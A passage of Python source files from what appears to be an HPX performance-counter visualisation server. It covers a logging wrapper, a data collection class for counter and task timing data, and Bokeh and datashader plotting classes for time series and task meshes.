# to avoid printing the same message twice to the console
for h in logging.getLogger(name).handlers:
h.setFormatter(self.formatter)
self.log_file = None
def addHandler(self, handler, verbosity: int) -> None:
"""Adds a custom logging StreamHandler to the logging module
Parameters
----------
handler : StreamHandler
logging stream handler to add to the logging module
verbosity : int
2 (by default) : infos, warning and errors are printed
1 : only warning and errors are printed
0 : only errors are printed
"""
if int(verbosity) == 2:
handler.setLevel(logging.INFO)
elif int(verbosity) == 1:
handler.setLevel(logging.WARNING)
elif int(verbosity) == 0:
handler.setLevel(logging.ERROR)
handler.setFormatter(self.formatter)
self.handlers.append(handler)
self.logger.addHandler(handler)
def setLogFile(self, filename: str) -> None:
"""Specifies a file which will contain the log.
If there is already a log file, this function won't do anything.
Warning
-------
Beware that the logger will add first erase any content which could be in
filename before writing the log.
"""
if not self.log_file:
# Erase any content of the file
with open(filename, "w") as file:
file.close()
file_log_handler = logging.FileHandler(filename)
file_log_handler.setFormatter(self.formatter)
self.logger.addHandler(file_log_handler)
self.log_file = filename
def setVerbosity(self, verbosity: int) -> None:
"""Sets the level of verbosity of the logger.
Parameters
----------
verbosity
2 (by default) : infos, warning and errors are printed
1 : only warning and errors are printed
0 : only errors are printed
"""
if int(verbosity) == 2:
self.logger.setLevel(logging.INFO)
elif int(verbosity) == 1:
self.logger.setLevel(logging.WARNING)
elif int(verbosity) == 0:
self.logger.setLevel(logging.ERROR)
def flush(self):
"""Flushes the last entry in all log handlers."""
for h in logging.getLogger(self.name).handlers:
h.flush()
# Dirty hack for flushing the console, because of the NullHandler
sys.stdout.write("\033[F") # back to previous line
sys.stdout.write("\033[K") # clear line
sys.stdout.flush()
def info(self, message: str, flush=False) -> None:
"""Emits an information in the log.
Parameters
----------
message
Message to be send to the logger
flush
If True, flushes the last line in the console output"""
if flush:
self.flush()
self.logger.info(message)
def warning(self, message: str, flush=False) -> None:
"""Emits a warning in the log.
Parameters
----------
message
Message to be send to the logger
flush
If True, flushes the last line in the console output"""
if flush:
self.flush()
self.logger.warning(message)
def error(self, message: str, flush=False) -> None:
"""Emits an error in the log.
Parameters
----------
message
Message to be send to the logger
flush
If True, flushes the last line in the console output"""
if flush:
self.flush()
self.logger.error(message)
```
#### File: server/data/collection.py
```python
from typing import Union
import hashlib
import numpy as np
import pandas as pd
from ...common.logger import Logger
from ...common.constants import task_cmap, task_plot_margin
logger = Logger()
class _NumpyArrayList:
"""This class allows for the growing of a numpy array of unknown size.
Using np.append() for each DataCollection.add_line would be a waste ressources.
This class is a wrapper around numpy arrays to allow for efficiently allocate and
grow 2D numpy arrays.
"""
def __init__(self, size_x, dtype, capacity=100):
self.data = np.empty((capacity, size_x), dtype=dtype)
self.capacity = capacity
self.size = 0
self.size_x = size_x
self.dtype = dtype
def append(self, row):
if self.size == self.capacity:
self.capacity *= 2
new_data = np.empty((self.capacity, self.size_x))
new_data[: self.size] = self.data
self.data = new_data
for i, element in enumerate(row):
self.data[self.size, i] = element
self.size += 1
def replace(self, array):
self.data = array
self.capacity = len(array)
self.size = len(array)
def get(self):
return self.data[: self.size, :]
def format_instance(locality, pool=None, worker_id="total"):
""""""
return (str(locality), pool, str(worker_id))
def from_instance(instance):
"""Returns the locality id, pool and thread id the str `instance`.
If `instance` is not valid, then None is returned."""
if isinstance(instance, tuple) or isinstance(instance, list):
if not len(instance) == 3:
return None
if isinstance(instance, list):
instance = tuple(instance)
return instance
elif isinstance(instance, str):
return instance, None, "total"
else:
return None
class DataCollection:
"""
The data collection class provides an interface for storing and reading hpx performance data"""
_id_counter = 0
def __init__(self):
self.start_time = None
self.end_time = None
self._counter_info = {}
self._data = {}
# Task data
self._task_data = {}
self._task_id = 0
self.instances = {}
# Variables for the growing numpy array
self._line_to_hash = {}
self._numpy_data = _NumpyArrayList(3, "float")
self._id = self._id_counter
self._id_counter += 1
self.timings = []
self.line_timing = []
def _add_instance_name(self, locality, pool=None, worker_id=None) -> None:
"""Adds the instance name to the list of instance names stored in the class."""
if not locality:
return
if locality not in self.instances:
self.instances[str(locality)] = {}
if pool not in self.instances[locality]:
self.instances[locality][pool] = {}
if worker_id not in self.instances[locality][pool]:
self.instances[locality][pool][worker_id] = []
def _get_instance_infos(self, full_instance: str) -> None:
""""""
if full_instance.startswith("/"):
return None, None, None
instance_split = full_instance.split("/")
locality = instance_split[0].split("#")[1]
worker_id = None
pool = None
if "total" in instance_split[1]:
worker_id = "total"
else:
if len(instance_split) == 2:
pool = None
worker_id = instance_split[1].split("#")[1]
elif "total" in instance_split[2]:
pool = instance_split[1].split("#")[1]
worker_id = "total"
else:
pool = instance_split[1].split("#")[1]
worker_id = instance_split[2].split("#")[1]
return locality, pool, worker_id
def add_task_data(
self, locality, worker_id: int, name, start: float, end: float, initial_capacity=1000
):
"""Adds one task to the task data of the collection.
This function also pre-builds the triangle mesh for the task plot that is used by datashader
Arguments
---------
locality : int
locality index of the task
worker_id : int
id of the worker
name : str
name of the task
start : float
timestamp of the beginning of the task
end : float
timestamp of the end of the task
initial_capacity : int
size of the pre-allocated numpy array where the data will be stored
(only used if this is the first the locality is encountered)
"""
import time
self._add_instance_name(locality, pool="default", worker_id=worker_id)
if locality not in self._task_data:
self._task_data[locality] = {
"data": _NumpyArrayList(4, "float", initial_capacity),
"verts": _NumpyArrayList(4, "float", initial_capacity * 4),
"tris": _NumpyArrayList(3, np.int, initial_capacity * 2),
"name_list": [],
"name_set": set(),
"min": np.finfo(float).max,
"max": np.finfo(float).min,
"workers": set(),
"min_time": float(start),
}
worker_id = float(worker_id)
start = float(start) # - self._task_data[locality]["min_time"]
end = float(end) # - self._task_data[locality]["min_time"]
if start < self._task_data[locality]["min"]:
self._task_data[locality]["min"] = start
if end > self._task_data[locality]["max"]:
self._task_data[locality]["max"] = end
top = worker_id + 1 / 2 * (1 - task_plot_margin)
bottom = worker_id - 1 / 2 * (1 - task_plot_margin)
self._task_data[locality]["name_list"].append(name)
self._task_data[locality]["name_set"].add(name)
self._task_data[locality]["workers"].add(worker_id)
color_hash = int(hashlib.md5(name.encode("utf-8")).hexdigest(), 16) % len(task_cmap)
t = time.time()
self._task_data[locality]["data"].append([worker_id, start, end, self._task_id])
t1 = time.time() - t
idx = self._task_data[locality]["verts"].size
# Bottom left pt
self._task_data[locality]["verts"].append([start, bottom, color_hash, self._task_id])
# Top left pt
self._task_data[locality]["verts"].append([start, top, color_hash, self._task_id])
# Top right pt
self._task_data[locality]["verts"].append([end, top, color_hash, self._task_id])
# Bottom right pt
self._task_data[locality]["verts"].append([end, bottom, color_hash, self._task_id])
self._task_id += 1
# Triangles
self._task_data[locality]["tris"].append([idx, idx + 1, idx + 2])
self._task_data[locality]["tris"].append([idx, idx + 2, idx + 3])
self.timings.append([t1])
def import_task_data(self, task_data, color_hash_dict=None):
"""Imports task data into the collection from a pandas DataFrame in one go.
This function is there to speed-up import, but in fact does the same thing as add_task_data
Arguments
---------
task_data : pd.DataFrame
dataframe that should have the columns `name`, `locality`, `worker_id`, `start` and
`end`
color_hash_dict : dict
specify a custom color hash dictionnary for the task names. This option should be used
together with the cmap option in the task plot.
"""
if task_data.empty:
return
self._task_data = {}
df = task_data.groupby("locality", sort=False)
for locality, group in df:
locality = str(locality)
group = group.reindex()
min_time = group["start"].min()
max_time = group["end"].max()
self._task_data[locality] = {
"data": _NumpyArrayList(4, "float"),
"verts": _NumpyArrayList(4, "float"),
"tris": _NumpyArrayList(3, np.int),
"name_list": group["name"].to_list(),
"min": min_time,
"max": max_time,
"workers": set(group["worker_id"].to_list()),
"min_time": min_time,
}
for worker_id in self._task_data[locality]["workers"]:
self._add_instance_name(locality, pool="default", worker_id=worker_id)
self._task_data[locality]["name_set"] = set(self._task_data[locality]["name_list"])
size = len(group)
group["index"] = np.arange(size)
if color_hash_dict:
group["color_hash"] = group["name"].apply(lambda name: color_hash_dict[name])
else:
group["color_hash"] = group["name"].apply(
lambda name: int(hashlib.md5(name.encode("utf-8")).hexdigest(), 16)
% len(task_cmap)
)
group["top"] = group["worker_id"] + 1 / 2 * (1 - task_plot_margin)
group["bottom"] = group["worker_id"] - 1 / 2 * (1 - task_plot_margin)
# Build the vertices
bottom_left = group[["start", "bottom", "color_hash", "index"]].rename(
columns={"start": "x", "bottom": "y"}
)
top_left = group[["start", "top", "color_hash", "index"]].rename(
columns={"start": "x", "top": "y"}
)
top_right = group[["end", "top", "color_hash", "index"]].rename(
columns={"end": "x", "top": "y"}
)
bottom_right = group[["end", "bottom", "color_hash", "index"]].rename(
columns={"end": "x", "bottom": "y"}
)
# Build the triangles indices
group["v1"] = group["index"] + size
group["v2"] = group["index"] + 2 * size
group["v3"] = group["index"] + 3 * size
tris_1 = group[["index", "v1", "v2"]].rename(columns={"index": "v0"})
tris_2 = group[["index", "v2", "v3"]].rename(
columns={"index": "v0", "v2": "v1", "v3": "v2"}
)
self._task_data[locality]["data"].replace(
group[["worker_id", "start", "end", "index"]].to_numpy()
)
self._task_data[locality]["verts"].replace(
pd.concat([bottom_left, top_left, top_right, bottom_right]).to_numpy().astype(float)
)
self._task_data[locality]["tris"].replace(pd.concat([tris_1, tris_2]).to_numpy())
def add_line(
self,
countername: str,
instance: Union[tuple, str],
parameters: Union[str, None],
sequence_number: int,
timestamp: float,
timestamp_unit: str,
value: str,
value_unit: Union[str, None],
) -> None:
"""Adds a line of data to the DataCollection.
Parameters
----------
countername
complete name of the performance counter without the full instance name
parameter
parameters
parameter(s) of the hpx performance counter
instance
counter instance name or tuple given by the format_instance function
sequence_number
sequence number of the counter invocation
timestamp
time stamp at which the information has been sampled
timestamp_unit
unit of the timestamp
value
actual counter value
(could be simple number or multiple numbers separated by ':')
value_unit
unit of the counter value
"""
name = countername
if parameters:
name = countername + "@" + parameters
if name not in self._data:
self._data[name] = {}
if isinstance(instance, tuple):
locality, pool, worker_id = instance
else:
locality, pool, worker_id = self._get_instance_infos(instance)
instance = instance
if locality:
self._add_instance_name(locality, pool, worker_id)
instance = format_instance(locality, pool, worker_id)
try:
value = float(value)
except ValueError:
value = str(value)
# Growing numpy array
key = (self._id, name, instance)
if key not in self._line_to_hash:
self._line_to_hash[key] = float(len(self._line_to_hash.keys()))
import time
t = time.time()
self._numpy_data.append([timestamp, value, self._line_to_hash[key]])
self.line_timing.append(time.time() - t)
line = [int(sequence_number), timestamp, timestamp_unit, value, value_unit]
if instance not in self._data[name]:
self._data[name][instance] = []
self._data[name][instance].append(line)
def get_counter_names(self):
"""Returns the list of available counters that are currently in the collection."""
return list(self._data.keys())
def task_mesh_data(self, locality):
""""""
if locality not in self._task_data:
return [[0, 0, 0, 0]], [[0, 0, 0]], ((0, 1), (0, 1))
# Find the plot ranges
max_worker_id = max(self._task_data[locality]["workers"])
min_time = self._task_data[locality]["min"]
max_time = self._task_data[locality]["max"]
vertices = pd.DataFrame(
self._task_data[locality]["verts"].get(), columns=["x", "y", "z", "patch_id"]
)
triangles = pd.DataFrame(
self._task_data[locality]["tris"].get().astype(int), columns=["v0", "v1", "v2"]
)
x_range = (min_time, max_time)
y_range = (-1 + task_plot_margin, max_worker_id + 1 / 2 * (1 - task_plot_margin))
return vertices, triangles, (x_range, y_range)
def get_data(self, countername: str, instance: tuple, index=0):
"""Returns the data of the specified countername and the instance.
Arguments
---------
countername : str
name of the HPX performance counter
instance : tuple
instance identifier (locality, pool, worker id) returned by the format_instance function
index : int
start from specified index
Returns
-------
ndarray where the columns in order are sequence number, timestamp, timestamp unit,
value and value unit
"""
if countername not in self._data:
return np.array([])
if instance in self._data[countername]:
if index >= len(self._data[countername][instance]):
return np.array([])
return np.array(self._data[countername][instance][index:], dtype="O")
else:
return np.array([])
def line_data(self):
return self._numpy_data.get()
def task_data(self, locality):
if locality not in self._task_data:
return [], []
return self._task_data[locality]["data"].get(), self._task_data[locality]["name_list"]
def get_task_names(self, locality):
if locality not in self._task_data:
return set()
return self._task_data[locality]["name_set"]
def get_localities(self):
"""Returns the list of available localities that are currently in the collection"""
return list(self.instances.keys())
def get_pools(self, locality):
"""Returns the list of available pools in a particular locality."""
if locality in self.instances:
pools = []
for pool in self.instances[locality].keys():
pools.append(pool)
return pools
else:
return []
def get_num_worker_threads(self, locality):
"""Returns the number of worker threads in a particular locality."""
num = 0
if locality in self.instances:
for pool in self.instances[locality].keys():
worker_list = [
int(idx) for idx in self.instances[locality][pool].keys() if idx != "total"
]
if worker_list:
num += max(worker_list) + 1
return num
def get_worker_threads(self, locality, pool=None):
"""Returns the list of worker threads in a particular locality and pool."""
if locality in self.instances:
if pool in self.instances[locality]:
return [idx for idx in self.instances[locality][pool].keys() if idx != "total"]
return []
def export_counter_data(self):
"""Returns a pandas DataFrame that contains all the HPX performance counter data."""
# Note: this is not the most efficient way to do this and for longer runs this can take a
# few hundred of ms
dfs = [
pd.DataFrame(
columns=["sequence_number", "timestamp", "timestamp_unit", "value", "value_unit"]
)
]
for name in self._data.keys():
for instance in self._data[name].keys():
data = self.get_data(name, instance)
df = pd.DataFrame(
data,
columns=[
"sequence_number",
"timestamp",
"timestamp_unit",
"value",
"value_unit",
],
)
df["countername"] = name
locality, pool, thread = from_instance(instance)
df["locality"] = locality
df["pool"] = pool
df["thread"] = thread
dfs.append(df)
df = pd.concat(dfs).reset_index()
del df["index"]
return df
def export_task_data(self):
"""Returns a pandas DataFrame that contains all the HPX task data."""
dfs = [pd.DataFrame(columns=["worker_id", "start", "end", "name"])]
for locality in self.get_localities():
task_data, task_names = self.task_data(locality)
df = pd.DataFrame(task_data, columns=["worker_id", "start", "end", "name"])
df = df.astype({"worker_id": int})
df["locality"] = locality
df["name"] = task_names
dfs.append(df)
return pd.concat(dfs)
def set_start_time(self, start_time):
"""Sets the start start of the collection."""
self.start_time = start_time
def set_end_time(self, end_time):
"""Sets the end time of the collection."""
self.end_time = end_time
def set_counter_infos(self, counter_info):
"""Sets the counter infos of the collection."""
self._counter_info = counter_info
def line_to_hash(self, countername, instance):
"""Returns the associated hashed countername and instance stored in the object."""
key = (self._id, countername, instance)
if key not in self._line_to_hash:
self._line_to_hash[key] = float(len(self._line_to_hash.keys()))
return self._line_to_hash[key]
```
#### File: server/plots/base.py
```python
from abc import ABCMeta
from collections import OrderedDict
import random
import hashlib
import time
from bokeh.plotting import Figure
from bokeh import palettes
from ..data import DataAggregator
def get_figure_options():
""""""
o = Figure.properties()
o.add("tools")
o.add("x_axis_label")
o.add("y_axis_label")
return o
def get_colors(palette, names, order_list=True, shuffle=True):
"""Returns a list of colors from names with the associated color palette.
Arguments
---------
palette : str
name of bokeh color palette
names : list
list of names
order_list : bool
if True, then the names are sorted and attributed in order to the color palette.
if False, then the hashes of the names are used to identify the color. This means
that in this case, the color will always be the same for a unique name.
"""
palette_lookup = palettes.all_palettes[palette]
names = list(names)
# Take the biggest palette available
max_key = max(list(sorted(palette_lookup.keys())))
palette = palette_lookup[max_key]
# Some bokeh palettes repeat colors, we want just the unique set
palette = list(OrderedDict.fromkeys(palette))
if shuffle:
# Consistently shuffle palette - prevents just using low-range
random.Random(1324).shuffle(palette)
if order_list:
names.sort()
return [palette[i % len(palette)] for i in range(len(names))]
else:
# Quick and dirty hash table
return [
palette[int(hashlib.md5(n.encode("utf-8")).hexdigest(), 16) % len(palette)]
for n in names
]
class BaseElement(metaclass=ABCMeta):
""""""
instance_num = 0
def __init__(self, doc, refresh_rate=500, collection=None):
""""""
BaseElement.instance_num += 1
self._root = None
self._buffer = None
self._refresh_rate = refresh_rate
self._doc = doc
self._reset = False
self.set_collection(collection)
self._callback_object = doc.add_periodic_callback(self.update, refresh_rate)
def __del__(self):
if self._callback_object:
self._doc.remove_periodic_callback(self._callback_object)
def set_collection(self, collection):
self._collection = collection
if not collection:
self._select_most_recent_collection = True
self._collection = DataAggregator().get_live_collection()
else:
self._select_most_recent_collection = False
self._reset = True
def stop_update(self):
self._doc.remove_periodic_callback(self.update)
def update(self):
if (
self._select_most_recent_collection
and self._collection != DataAggregator().get_live_collection()
):
self._collection = DataAggregator().get_live_collection()
self._reset = True
def layout(self):
return self._root
class ThrottledEvent:
_callback = None
_lastcall = 0
_numcalls = 0
_total_time = 0
def __init__(self, doc, fire_rate=None, refresh_rate=50):
"""fire_rate in ms"""
self._doc = doc
self._doc.add_periodic_callback(self._fire_event, refresh_rate)
if fire_rate:
self._dynamic_fire_rate = False
self._fire_rate = fire_rate / 1000
else:
self._dynamic_fire_rate = True
self._fire_rate = 0.05
def add_event(self, callback):
self._callback = callback
self._lastcall = time.time()
if time.time() - self._lastcall > self._fire_rate:
self._doc.add_next_tick_callback(self._call_and_measure)
def _call_and_measure(self):
self._numcalls += 1
self._lastcall = time.time()
prev = time.time()
self._callback()
self._callback = None
self._total_time += time.time() - prev
if self._dynamic_fire_rate:
# Use buffer (10)
self._fire_rate = self._total_time / self._numcalls
def _fire_event(self):
if self._callback and time.time() - self._lastcall > self._fire_rate:
self._doc.add_next_tick_callback(self._call_and_measure)
self._lastcall = time.time()
```
#### File: server/plots/generator.py
```python
from collections import OrderedDict
from bokeh.plotting import Figure
from bokeh.layouts import column
from bokeh.models import Legend, LegendItem
import pandas as pd
from ..data import DataSources
from ..widgets import empty_placeholder
from .base import BaseElement, get_colors, get_figure_options
from .raster import ShadedTimeSeries
class TimeSeries(BaseElement):
""""""
def __init__(self, doc, shade=False, refresh_rate=500, print_stats=False, **kwargs):
""""""
super().__init__(doc, refresh_rate=refresh_rate)
self._defaults_opts = dict(
plot_width=800, plot_height=400, title="", x_axis_label="Time (s)"
)
self._defaults_opts.update(
(key, value) for key, value in kwargs.items() if key in get_figure_options()
)
self._data_sources = OrderedDict()
self._names = OrderedDict()
self._glyphs = OrderedDict()
# For shaded data
self._data = []
self._colors = []
self._color_ids = OrderedDict()
self._rebuild_figure = True
self._figure = None
self._reshade = True
self._x_range = None
self._y_range = None
self._is_shaded = shade
self._root = column(empty_placeholder())
self._show_legend = False
self._print_stats = print_stats
def add_line(self, countername, instance, collection=None, pretty_name=None, hold_update=False):
"""Adds a line to the plot.
Parameters
----------
countername
name of the counter
instance
instance (locality id, pool, thread id) given by format_instance()
collection
collection to plot from. If None, then it is the most recent run
pretty_name
name that will appear in the legend
hold_update
if True, the plot will not update itself. One has to manually call _make_figure()
"""
key = (countername, instance, collection, pretty_name)
if not pretty_name:
pretty_name = f"{countername};{instance};{collection}"
ds = DataSources().get_data(self._doc, countername, instance, collection)
self._data_sources[key] = ds
names = [name for _, _, _, name in self._data_sources.keys()]
self._colors = get_colors("Category20", names)
DataSources().listen_to(self._set_update, self._doc, countername, instance, collection)
if self._is_shaded:
self._reshade = True
else:
if not hold_update:
self._make_figure()
self._rebuild_figure = False
def remove_line(
self, countername, instance, collection=None, pretty_name=None, hold_update=False
):
"""Removes a line from the plot if it is present in the list.
Parameters
----------
countername
name of the counter
instance
instance (locality id, pool, thread id) given by format_instance()
collection
collection to plot from. If None, then it is the most recent run
pretty_name
name that will appear in the legend
hold
if True, the plot will not update itself. One has to manually call _make_figure()
"""
# TODO: does not update the plot correctly right now
key = (countername, instance, collection, pretty_name)
if key in self._data_sources:
del self._data_sources[key]
if key in self._glyphs:
del self._glyphs[key]
if not hold_update:
self._make_figure()
def remove_all(self):
""""""
self._data_sources.clear()
self._glyphs.clear()
self._colors = []
self._make_figure()
def update(self):
if self._reshade and self._is_shaded:
self._data = []
for key, ds in self._data_sources.items():
self._data.append(ds["data_source"].data)
# Rebuild the figure in case the user switched from shaded or vice-versa
if self._rebuild_figure:
self._make_figure()
self._rebuild_figure = False
self._reshade = False
if self._reshade and self._is_shaded:
self._build_shaded_data()
self._shaded_fig.set_data(
self._data,
self._colors,
self._x_range,
self._y_range,
)
self._reshade = False
# Get statistics of lines
if self._print_stats:
totals = []
means = []
for key in self._data_sources.keys():
countername, instance, collection, _ = key
total, mean = DataSources().get_stats(self._doc, countername, instance, collection)
totals.append(total)
means.append(mean)
if means:
total = sum(totals)
mean = sum(means)
print(f"Total: {total}, mean: {mean}, {len(totals)}")
def toggle_shade(self):
self._is_shaded = not self._is_shaded
self._rebuild_figure = True
def _build_shaded_data(self):
self._data = []
dataframes = {}
for _, _, collection, _ in self._data_sources.keys():
collection = DataSources().get_collection(collection)
if collection:
df = pd.DataFrame(collection.line_data(), copy=False)
df.rename(columns={0: "x", 1: "y", 2: "name"}, inplace=True)
dataframes[collection] = df
for countername, instance, collection, _ in self._data_sources.keys():
collection = DataSources().get_collection(collection)
if collection:
key = collection.line_to_hash(countername, instance)
df = dataframes[collection]
self._data.append(df[df["name"] == key])
else:
self._data.append({"x": [0], "y": [0]})
def _build_legend(self):
legend_items = []
for i, key in enumerate(self._glyphs.keys()):
_, _, _, name = key
legend_items.append(LegendItem(label=name, renderers=[self._glyphs[key]], index=i))
self._figure.add_layout(
Legend(items=legend_items, location="top_left", orientation="horizontal"), "above"
)
def _set_update(self):
self._reshade = True
def _make_figure(self):
if self._figure:
del self._figure
self._glyphs.clear()
if self._is_shaded:
self._build_shaded_data()
self._shaded_fig = ShadedTimeSeries(
self._doc,
self._data,
self._colors,
**self._defaults_opts,
)
self._figure = self._shaded_fig.layout()
else:
self._figure = Figure(**self._defaults_opts)
for key, ds in self._data_sources.items():
if key not in self._glyphs:
index = list(self._data_sources.keys()).index(key)
self._glyphs[key] = self._figure.line(
x=ds["x_name"],
y=ds["y_name"],
source=ds["data_source"],
line_color=self._colors[index],
line_width=2,
)
self._build_legend()
self._root.children[0] = self._figure
```
#### File: server/plots/raster.py
```python
import time
from functools import partial
import colorcet
from bokeh.models import ColumnDataSource, HoverTool
from bokeh.plotting import figure
from bokeh.events import Reset, MouseWheel, PanEnd, MouseMove
import numpy as np
import pandas as pd
import xarray as xr
import datashader as ds
import datashader.transfer_functions as tf
from .base import BaseElement, ThrottledEvent, get_figure_options
from ..utils import format_time
from ..worker import WorkerQueue
from ...common.constants import task_cmap
empty_task_mesh = [
[[0, 0, 0, 0]],
[[0, 0, 0]],
((0, 1), (0, 1)),
]
def _is_intersecting(interval1, interval2):
""""""
return interval1[0] <= interval2[1] and interval2[0] <= interval1[1]
def _is_data_in_range(df, x_col, y_col, x_range=None, y_range=None):
""""""
if not len(df[x_col]) or not len(df[y_col]):
return False
if not isinstance(df, dict):
df = pd.DataFrame(df)
if x_range and y_range:
idx_left = df[x_col].sub(x_range[0]).astype(float).abs().idxmin()
idx_right = df[x_col].sub(x_range[1]).astype(float).abs().idxmin()
if idx_left == idx_right:
return False
x_sub = df[x_col].loc[idx_left:idx_right]
y_sub = df[y_col].loc[idx_left:idx_right]
minx, miny = min(x_sub), min(y_sub)
maxx, maxy = max(x_sub), max(y_sub)
return _is_intersecting((minx, maxx), x_range) and _is_intersecting((miny, maxy), y_range)
elif x_range:
return _is_intersecting((min(df[x_col]), max(df[x_col])), x_range)
elif y_range:
return _is_intersecting((min(df[y_col]), max(df[y_col])), y_range)
else:
return True
def _normalize_ranges(x_range, y_range):
""""""
if x_range[0] == x_range[1]:
x_range = (max(x_range[0] - 1.0, 0.0), x_range[0] + 1.0)
if y_range[0] == y_range[1]:
y_range = (max(y_range[0] - 1.0, 0.0), y_range[0] + 1.0)
return x_range, y_range
def _compare_ranges(range1, range2, epsilon=1e-3):
"""Returns true if the both range are close enough (within a relative epsilon)."""
if not range1[0] or not range2[0]:
return False
return abs(range1[0] - range2[0]) < epsilon and abs(range1[1] - range2[1]) < epsilon
def shade_mesh(vertices, triangles, cmap=colorcet.rainbow, **kwargs):
""""""
if "plot_width" not in kwargs or "plot_height" not in kwargs:
raise ValueError("Please provide plot_width and plot_height for the canvas.")
if not isinstance(vertices, pd.DataFrame):
vertices = pd.DataFrame(vertices, columns=["x", "y", "z", "patch_id"], copy=False)
if not isinstance(triangles, pd.DataFrame):
triangles = pd.DataFrame(triangles, columns=["v0", "v1", "v2"], copy=False)
cvs = ds.Canvas(**kwargs)
img = cvs.trimesh(vertices, triangles, interpolate="nearest")
summary = ds.summary(id_info=ds.max("patch_id"))
summary.column = "z"
hover_agg = cvs.trimesh(vertices, triangles, agg=summary)
res = tf.shade(img, cmap=cmap, how="linear", span=[0, len(cmap)]), hover_agg
return res
def shade_line(data, colors=None, **kwargs):
""""""
if "plot_width" not in kwargs or "plot_height" not in kwargs:
raise ValueError("Please provide plot_width and plot_height for the canvas.")
if isinstance(data, (list, tuple)) and isinstance(colors, (list, tuple)):
if len(data) != len(colors):
raise ValueError("colors should have the same length as data.")
if isinstance(data, (dict, pd.DataFrame)):
data = [data]
if colors and isinstance(colors, str):
colors = [colors] * len(data)
if "x_range" not in kwargs or "y_range" not in kwargs:
x_range, y_range = get_ranges(data)
if "x_range" not in kwargs:
kwargs["x_range"] = x_range
if "y_range" not in kwargs:
kwargs["y_range"] = y_range
kwargs["x_range"], kwargs["y_range"] = _normalize_ranges(kwargs["x_range"], kwargs["y_range"])
cvs = ds.Canvas(**kwargs)
aggs = []
cs = []
for i, line in enumerate(data):
df = line
if not isinstance(line, pd.DataFrame):
df = pd.DataFrame(line).astype(float)
plot = True
if "x_range" in kwargs and "y_range" in kwargs:
plot = _is_data_in_range(df, "x", "y", kwargs["x_range"], kwargs["y_range"])
elif "x_range" in kwargs:
plot = _is_data_in_range(df, "x", "y", kwargs["x_range"])
elif "y_range" in kwargs:
plot = _is_data_in_range(df, "x", "y", y_range=kwargs["y_range"])
if len(df["x"]) == 0 or len(df["y"]) == 0:
plot = False
if plot:
aggs.append(cvs.line(df, "x", "y"))
if colors:
cs.append(colors[i])
if not aggs:
return xr.DataArray(np.zeros((kwargs["plot_height"], kwargs["plot_width"]), dtype=int))
if colors:
imgs = [tf.shade(aggs[i], cmap=[c]) for i, c in enumerate(cs)]
return tf.stack(*imgs)
else:
imgs = [tf.shade(aggs[i]) for i in range(len(data))]
return tf.stack(*imgs)
def get_ranges(data):
""""""
finfo = np.finfo(float)
x_range = (finfo.max, finfo.min)
y_range = (finfo.max, finfo.min)
if isinstance(data, (dict, pd.DataFrame)):
data = [data]
for line in data:
if not len(line["x"]) or not len(line["y"]):
continue
x_range = (min(min(line["x"]), x_range[0]), max(max(line["x"]), x_range[1]))
y_range = (min(min(line["y"]), y_range[0]), max(max(line["y"]), y_range[1]))
if x_range[0] == y_range[0] == finfo.max or x_range[1] == y_range[0] == finfo.min:
return (0.0, 1.0), (0.0, 1.0)
return x_range, y_range
def _is_equal(x, y, epsilon=1e-6):
return abs(x - y) < epsilon
class ShadedPlot(BaseElement):
""""""
def __init__(
self,
doc,
refresh_rate=500,
**kwargs,
):
""""""
super().__init__(doc, refresh_rate)
self._kwargs = kwargs
self._throttledEvent = ThrottledEvent(doc, 50)
# Variable for freezing the ranges if the user interacted with the plot
self._keep_range = False
self._current_x_range, self._current_y_range = self._calculate_ranges()
self._bokeh_x_range, self._bokeh_y_range = self._current_x_range, self._current_y_range
self._num_range_updates = 0
self._defaults_opts = dict(plot_width=800, plot_height=300, title="")
self._defaults_opts.update(
(key, value) for key, value in kwargs.items() if key in get_figure_options()
)
if "x_range" in self._defaults_opts:
self._current_x_range = self._defaults_opts["x_range"]
if "y_range" in self._defaults_opts:
self._current_y_range = self._defaults_opts["y_range"]
self._root = figure(**self._defaults_opts)
self._root.on_event(MouseWheel, self._freeze_ranges)
self._root.on_event(PanEnd, self._freeze_ranges)
self._root.x_range.range_padding = self._root.y_range.range_padding = 0
self._root.on_event(Reset, self._reset_fct)
def _reset_fct(self, event):
""""""
self._current_x_range, self._current_y_range = self._calculate_ranges()
self._reshade()
self._keep_range = False
self._last_reset = time.time()
def _freeze_ranges(self, *args):
self._keep_range = True
def _calculate_ranges(self):
return (0, 1), (0, 1)
def _reshade(self, immediate=False):
pass
def set_data(self):
pass
def update(self):
if self._keep_range:
x_range = self._root.x_range
y_range = self._root.y_range
x_range = (x_range.start, x_range.end)
y_range = (y_range.start, y_range.end)
if x_range == self._bokeh_x_range and x_range == self._bokeh_x_range:
self._num_range_updates += 1
else:
self._num_range_updates = 0
self._bokeh_x_range = x_range
self._bokeh_y_range = y_range
if self._num_range_updates > 2:
return
if x_range[0]:
self._current_x_range = x_range
if y_range[0]:
self._current_y_range = y_range
self._reshade(True)
def set_range(self, x_range=None, y_range=None):
if x_range:
self._current_x_range = y_range
if y_range:
self._current_y_range = y_range
self._reshade()
class ShadedTaskPlot(ShadedPlot):
""""""
def __init__(
self,
doc,
vertices,
triangles,
data_ranges,
names,
data,
refresh_rate=500,
cmap=task_cmap,
**kwargs,
):
self._vertices = vertices
self._triangles = triangles
self._data_ranges = data_ranges
self._names = names
self._data = data
self._hovered_mesh = empty_task_mesh[0:2] # For highlighting the hovered task on the plot
self._last_hovered = -1
self._throttled_mouseEvent = ThrottledEvent(doc)
super().__init__(doc, refresh_rate, **kwargs)
self.task_cmap = cmap
self._img, self._hover_agg = shade_mesh(
vertices,
triangles,
self.task_cmap,
plot_width=self._defaults_opts["plot_width"],
plot_height=self._defaults_opts["plot_height"],
x_range=self._current_x_range,
y_range=self._current_y_range,
)
self._ds = ColumnDataSource(
{
"img": [self._img.values],
"dw": [self._current_x_range[1] - self._current_x_range[0]],
"dh": [self._current_y_range[1] - self._current_y_range[0]],
"x": [self._current_x_range[0]],
"y": [self._current_y_range[0]],
}
)
# When the user hovers with the mouse on a task, it becomes highlighted
self._hovered_img, _ = shade_mesh(
*self._hovered_mesh,
"black",
plot_width=self._defaults_opts["plot_width"],
plot_height=self._defaults_opts["plot_height"],
x_range=self._current_x_range,
y_range=self._current_y_range,
)
self._hovered_ds = ColumnDataSource(
{
"img": [self._hovered_img.values],
"dw": [self._current_x_range[1] - self._current_x_range[0]],
"dh": [self._current_y_range[1] - self._current_y_range[0]],
"x": [self._current_x_range[0]],
"y": [self._current_y_range[0]],
}
)
self._hover_tool = HoverTool()
